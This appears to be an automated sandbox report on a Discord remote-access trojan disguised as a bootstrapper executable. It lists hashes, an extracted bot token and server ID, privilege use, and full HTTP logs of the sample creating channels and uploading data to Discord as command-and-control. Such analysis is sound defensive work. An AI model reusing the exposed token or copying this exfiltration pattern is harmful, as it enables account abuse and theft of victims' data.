discordrat | a951913d185f6d17a9914d5dc323120e2515a89e36ec8c3e76e8f65266c72a1c

Analysis

max time kernel
66s
max time network
71s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10/10/2024, 01:51 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

coalie_Bootstrapper (1).exe
Size

78KB
MD5

dd58b694ac477dd7d287d71851d72daf
SHA1

ed4fc96bdb8b937a2d4ac63e44b939de693da166
SHA256

a951913d185f6d17a9914d5dc323120e2515a89e36ec8c3e76e8f65266c72a1c
SHA512

eb9823326ec23411c4204e2e46317745237bdaa081bab1841243dc9ba14298ccf130a5494c426435b51a7cbb533018e5731525e23b2388b7eb90bdd04603aa14
SSDEEP

1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+YPIC:5Zv5PDwbjNrmAE+8IC

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI5MzY4MTEyNTMyMjkyMDAyMg.Gdnf8n.qp5LydNzseDz9myc10SgS4lIBm-8sUwQ5sqEZY
server_id
1293094628500832319

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
39	discord.com
40	discord.com
10	discord.com
11	discord.com
22	discord.com

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	coalie_Bootstrapper (1).exe

C:\Users\Admin\AppData\Local\Temp\coalie_Bootstrapper (1).exe
"C:\Users\Admin\AppData\Local\Temp\coalie_Bootstrapper (1).exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:4780

Network

DNS

gateway.discord.gg

coalie_Bootstrapper (1).exe

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.130.234

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.136.234

gateway.discord.gg

IN A

162.159.133.234

gateway.discord.gg

IN A

162.159.134.234
GET

https://gateway.discord.gg/?v=9&encording=json

coalie_Bootstrapper (1).exe

Remote address:

162.159.130.234:443

Request

GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: UpgTIIiGhUh+4CFY4jkRCA==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg

Response

HTTP/1.1 101 Switching Protocols

Date: Thu, 10 Oct 2024 01:51:24 GMT
Connection: upgrade
sec-websocket-accept: B9CHlo0nlmkKUZtJ+X6noxQDyqg=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CiPFEHAX4wBdnexWrjsux8B3xUcw%2FdQm6PuM9BHw9Hnu1rNZBzPRq8hEVfbiS7kQwLGUccDiq8FWeSCFC2GAFpZtndklVN9Vi0YREfsokKkHcV22tl3vSRkqOrSG%2FZS8MQ39yA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8d02f710cebe6400-LHR
DNS

discord.com

coalie_Bootstrapper (1).exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232
POST

https://discord.com/api/v9/guilds/1293094628500832319/channels

coalie_Bootstrapper (1).exe

Remote address:

162.159.138.232:443

Request

POST /api/v9/guilds/1293094628500832319/channels HTTP/1.1
authorization: Bot MTI5MzY4MTEyNTMyMjkyMDAyMg.Gdnf8n.qp5LydNzseDz9myc10SgS4lIBm-8sUwQ5sqEZY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 201 Created

Date: Thu, 10 Oct 2024 01:51:25 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=285dec5c86aa11efb6047a7a73a4c95c; Expires=Tue, 09-Oct-2029 01:51:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1991
x-ratelimit-reset: 1728608071.250
x-ratelimit-reset-after: 82986.150
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W6V5qnr0h4g4LOMrMqSiTFEf6KvLaIxGqwgQvLCvKWNP2pdatGF%2F%2BGgtr6oKE19RKlHR8C6JVwSQ1Qyo%2FVvRLg8eLOjM86SnrcVu7uWvdVTpUg9Nyx%2F%2B4yupS2Xl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=285dec5c86aa11efb6047a7a73a4c95c8e51e4c4777019ab8f42997de58b37cfe3ff0d9f3cd448542b9d994f95ef7eea; Expires=Tue, 09-Oct-2029 01:51:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=49bd02ff79e8fafa6851553ede73fc377fbee619-1728525085; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=EqRyqVR9_dEnzoxGQ.WuZB8VCb7z2cRd5obJwL9dcP0-1728525085202-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d02f7153a686421-LHR
DNS

geolocation-db.com

coalie_Bootstrapper (1).exe

Remote address:

8.8.8.8:53

Request

geolocation-db.com

IN A

Response

geolocation-db.com

IN A

159.89.102.253
GET

https://geolocation-db.com/json

coalie_Bootstrapper (1).exe

Remote address:

159.89.102.253:443

Request

GET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 01:51:25 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
GET

https://geolocation-db.com/json/

coalie_Bootstrapper (1).exe

Remote address:

159.89.102.253:443

Request

GET /json/ HTTP/1.1
Host: geolocation-db.com

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 01:51:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
DNS

234.130.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.130.159.162.in-addr.arpa

IN PTR

Response
DNS

64.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.159.190.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

232.138.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.138.159.162.in-addr.arpa

IN PTR

Response
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1293752719604973578/messages

coalie_Bootstrapper (1).exe

Remote address:

162.159.138.232:443

Request

POST /api/v9/channels/1293752719604973578/messages HTTP/1.1
authorization: Bot MTI5MzY4MTEyNTMyMjkyMDAyMg.Gdnf8n.qp5LydNzseDz9myc10SgS4lIBm-8sUwQ5sqEZY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 115
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 10 Oct 2024 01:51:25 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=28af343686aa11efb25252917d0a898c; Expires=Tue, 09-Oct-2029 01:51:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728525086.648
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBSlbQKKRy9D9Y4qAgi4akQXUHuNGTnCnHYNE77R2wPvx6uMwWQ5uiAMzWUgv8YLAHHFDumGCP0dGtFTsdAhPwsuG3IWz8c2VbemCCAZjwqovcbl3ubGYYS2sg21"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=28af343686aa11efb25252917d0a898ce8c610833c6aab331bbb4d86c76680f7f8f8133504584dcc1fce8355f1eef0e4; Expires=Tue, 09-Oct-2029 01:51:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=49bd02ff79e8fafa6851553ede73fc377fbee619-1728525085; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=aU13BpDPbzOHp_8BRXUcz2pZe_zUvSWbC1i4IvklVXc-1728525085735-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d02f718bb1fcdb2-LHR
DNS

253.102.89.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.102.89.159.in-addr.arpa

IN PTR

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1293752719604973578/messages

coalie_Bootstrapper (1).exe

Remote address:

162.159.138.232:443

Request

POST /api/v9/channels/1293752719604973578/messages HTTP/1.1
authorization: Bot MTI5MzY4MTEyNTMyMjkyMDAyMg.Gdnf8n.qp5LydNzseDz9myc10SgS4lIBm-8sUwQ5sqEZY
Content-Type: multipart/form-data; boundary="1a41e39a-daf3-473e-b7e8-9ea4e4ed6499"
Host: discord.com
Content-Length: 241028
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 10 Oct 2024 01:52:10 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=434d6a2e86aa11ef9b3a8e9ab1ab452b; Expires=Tue, 09-Oct-2029 01:52:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728525130.609
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9SEXMCqsPWkkTHcEIR6UBGyNdUD9gU%2BQm65b7vvb5pwy%2BzkWlCdlncYYbhfaCKQ8DAptds%2FXEaC5MWu6ml0ta8EsXYIb6PApH5Z%2Fpv0Gt7Rx6B6%2BzDnxIhwmgWXI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=434d6a2e86aa11ef9b3a8e9ab1ab452b35522993ba4db498ef7f8db2991ee05fc2cd78bf3f488a6505303734485e8bbe; Expires=Tue, 09-Oct-2029 01:52:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=cb45ffa259df31ea5d0b0a2a0dd3c1eadea13a0f-1728525130; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=wrQuySjoyFCtmY2YIzzyAClZzlwrmwzkNe_t.OFic9Y-1728525130392-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d02f82adbcf41a0-LHR
POST

https://discord.com/api/v9/channels/1293752719604973578/messages

coalie_Bootstrapper (1).exe

Remote address:

162.159.138.232:443

Request

POST /api/v9/channels/1293752719604973578/messages HTTP/1.1
authorization: Bot MTI5MzY4MTEyNTMyMjkyMDAyMg.Gdnf8n.qp5LydNzseDz9myc10SgS4lIBm-8sUwQ5sqEZY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Thu, 10 Oct 2024 01:52:10 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=438564f686aa11ef8b367ec20891a5fc; Expires=Tue, 09-Oct-2029 01:52:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728525131.658
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksgWrG4tQptSA3X7fmzwTmAhoPwevjLpMlu%2FbGxBTAgZ%2B37sx5CrjNsHcomvkI8Lj02%2F9K2ruSBoSK5iv2kEYwupLm9dYZzdr%2BoWzkC2XoyEFLdjxkXvS1NurXit"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=438564f686aa11ef8b367ec20891a5fc0ef9f23b7b137726033bbde7b6a019f62d90c8f5ca25a5b7c9cf88756cc31bbc; Expires=Tue, 09-Oct-2029 01:52:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=cb45ffa259df31ea5d0b0a2a0dd3c1eadea13a0f-1728525130; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=Sl6qd4zEVjDPqNUfvlAXsQ90NgGaJN6I22edKeMHY8Q-1728525130759-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d02f8315a42bd96-LHR

162.159.130.234:443

https://gateway.discord.gg/?v=9&encording=json

tls, http

coalie_Bootstrapper (1).exe

1.7kB
18.7kB
21
28

HTTP Request

GET https://gateway.discord.gg/?v=9&encording=json

HTTP Response

101
162.159.138.232:443

https://discord.com/api/v9/guilds/1293094628500832319/channels

tls, http

coalie_Bootstrapper (1).exe

1.1kB
5.5kB
10
12

HTTP Request

POST https://discord.com/api/v9/guilds/1293094628500832319/channels

HTTP Response

201
159.89.102.253:443

https://geolocation-db.com/json/

tls, http

coalie_Bootstrapper (1).exe

848 B
4.5kB
9
10

HTTP Request

GET https://geolocation-db.com/json

HTTP Response

301

HTTP Request

GET https://geolocation-db.com/json/

HTTP Response

200
162.159.138.232:443

https://discord.com/api/v9/channels/1293752719604973578/messages

tls, http

coalie_Bootstrapper (1).exe

1.3kB
3.0kB
9
10

HTTP Request

POST https://discord.com/api/v9/channels/1293752719604973578/messages

HTTP Response

200
162.159.138.232:443

https://discord.com/api/v9/channels/1293752719604973578/messages

tls, http

coalie_Bootstrapper (1).exe

249.9kB
7.0kB
188
97

HTTP Request

POST https://discord.com/api/v9/channels/1293752719604973578/messages

HTTP Response

200
162.159.138.232:443

https://discord.com/api/v9/channels/1293752719604973578/messages

tls, http

coalie_Bootstrapper (1).exe

1.2kB
3.0kB
9
11

HTTP Request

POST https://discord.com/api/v9/channels/1293752719604973578/messages

HTTP Response

200

8.8.8.8:53

gateway.discord.gg

dns

coalie_Bootstrapper (1).exe

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.130.234

162.159.135.234

162.159.136.234

162.159.133.234

162.159.134.234
8.8.8.8:53

discord.com

dns

coalie_Bootstrapper (1).exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.138.232

162.159.136.232

162.159.128.233

162.159.137.232

162.159.135.232
8.8.8.8:53

geolocation-db.com

dns

coalie_Bootstrapper (1).exe

64 B
80 B
1
1

DNS Request

geolocation-db.com

DNS Response

159.89.102.253
8.8.8.8:53

234.130.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.130.159.162.in-addr.arpa
8.8.8.8:53

64.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

64.159.190.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

232.138.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.138.159.162.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

253.102.89.159.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

253.102.89.159.in-addr.arpa
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1248-0-0x00007FF816963000-0x00007FF816965000-memory.dmp

Filesize
8KB

Download
memory/1248-1-0x0000017B00950000-0x0000017B00968000-memory.dmp

Filesize
96KB

Download
memory/1248-2-0x0000017B1B0D0000-0x0000017B1B292000-memory.dmp

Filesize
1.8MB

Download
memory/1248-3-0x00007FF816960000-0x00007FF817421000-memory.dmp

Filesize
10.8MB

Download
memory/1248-4-0x0000017B1B7D0000-0x0000017B1BCF8000-memory.dmp

Filesize
5.2MB

Download
memory/1248-5-0x00007FF816963000-0x00007FF816965000-memory.dmp

Filesize
8KB

Download
memory/1248-6-0x00007FF816960000-0x00007FF817421000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.